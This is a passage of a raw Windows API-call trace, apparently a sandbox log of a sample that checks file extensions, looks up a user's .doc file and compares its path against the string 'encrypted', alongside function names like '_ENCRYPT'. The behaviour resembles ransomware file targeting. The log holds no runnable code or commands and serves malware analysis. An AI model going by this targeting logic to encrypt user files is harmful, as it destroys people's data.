RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0034.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0034.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0034.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0034.024] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0034.024] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0034.024] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0034.024] FreeLibrary (hLibModule=0x76e10000) returned 1 [0034.024] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0034.024] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0034.024] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0034.024] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0034.024] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0034.025] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0034.025] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0034.025] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0034.025] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0034.025] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0034.025] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0034.025] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0034.025] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0034.025] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0034.025] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0034.025] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0034.025] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0034.025] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0034.025] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0034.025] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0034.025] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0034.025] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0034.025] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0034.025] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0034.025] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0034.025] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0034.025] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0034.025] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0034.025] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0034.025] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0034.025] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0034.025] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0034.025] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0034.025] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0034.025] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0034.025] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0034.025] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0034.025] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0034.025] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0034.025] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0034.026] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0034.026] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0034.026] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0034.026] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0034.026] FreeLibrary (hLibModule=0x76e10000) returned 1 [0034.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0034.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0034.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0034.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0034.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0034.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0034.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0034.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0034.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0034.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0034.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0034.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0034.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0034.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0034.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0034.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0034.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0034.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b85a8 | out: hHeap=0x770000) returned 1 [0034.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0034.026] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0034.026] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0034.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0034.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0034.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0034.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0034.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0034.027] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0034.027] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0034.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0034.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0034.027] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0034.027] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0034.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0034.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0034.027] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0034.027] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0034.027] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oc", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0034.027] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="doc", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0034.027] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".doc", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0034.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0034.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0034.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0034.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0034.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0034.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0034.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0034.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0034.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0034.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0034.027] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0034.027] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0034.027] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0034.027] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\guwDP36jwcK.doc", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x89fa99d0, ftCreationTime.dwHighDateTime=0x1d5b7a0, ftLastAccessTime.dwLowDateTime=0x3ddb67b0, ftLastAccessTime.dwHighDateTime=0x1d5c429, ftLastWriteTime.dwLowDateTime=0x3ddb67b0, ftLastWriteTime.dwHighDateTime=0x1d5c429, nFileSizeHigh=0x0, nFileSizeLow=0x1271, dwReserved0=0x0, dwReserved1=0x777648, cFileName="guwDP36jwcK.doc", cAlternateFileName="GUWDP3~1.DOC")) returned 0x7c20c0 [0034.027] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0034.028] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0034.028] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0034.028] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0034.028] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0034.028] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\guwDP36jwcK.doc", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x89fa99d0, ftCreationTime.dwHighDateTime=0x1d5b7a0, ftLastAccessTime.dwLowDateTime=0x3ddb67b0, ftLastAccessTime.dwHighDateTime=0x1d5c429, ftLastWriteTime.dwLowDateTime=0x3ddb67b0, ftLastWriteTime.dwHighDateTime=0x1d5c429, nFileSizeHigh=0x0, nFileSizeLow=0x1271, dwReserved0=0x0, dwReserved1=0x777648, cFileName="guwDP36jwcK.doc", cAlternateFileName="GUWDP3~1.DOC")) returned 0x7c20c0 [0034.028] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0034.028] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0034.028] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0034.028] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0034.028] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0034.028] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\guwDP36jwcK.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.028] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\guwDP36jwcK.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.028] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\guwDP36jwcK.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.028] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\guwDP36jwcK.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.028] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\guwDP36jwcK.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.028] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\guwDP36jwcK.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.028] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\guwDP36jwcK.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.028] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\guwDP36jwcK.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.028] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\guwDP36jwcK.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.028] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\guwDP36jwcK.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.028] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\guwDP36jwcK.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.028] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\guwDP36jwcK.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.028] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\guwDP36jwcK.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.028] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\guwDP36jwcK.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.028] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\guwDP36jwcK.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.028] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\guwDP36jwcK.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.028] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\guwDP36jwcK.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.028] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\guwDP36jwcK.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.028] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\guwDP36jwcK.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.029] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\guwDP36jwcK.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.029] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\guwDP36jwcK.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.029] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\guwDP36jwcK.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.029] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\guwDP36jwcK.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.029] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\guwDP36jwcK.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.029] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\guwDP36jwcK.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.029] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\guwDP36jwcK.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.029] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\guwDP36jwcK.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.029] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\guwDP36jwcK.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.029] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\guwDP36jwcK.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.029] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\guwDP36jwcK.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.029] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\guwDP36jwcK.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.029] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\guwDP36jwcK.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.029] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocuments\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\guwDP36jwcK.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.029] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cuments\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\guwDP36jwcK.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.029] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uments\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\guwDP36jwcK.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.029] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ments\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\guwDP36jwcK.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.029] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\guwDP36jwcK.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.029] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nts\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\guwDP36jwcK.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.029] CompareStringW (Locale=0x400, dwCmpFlags=0x1, 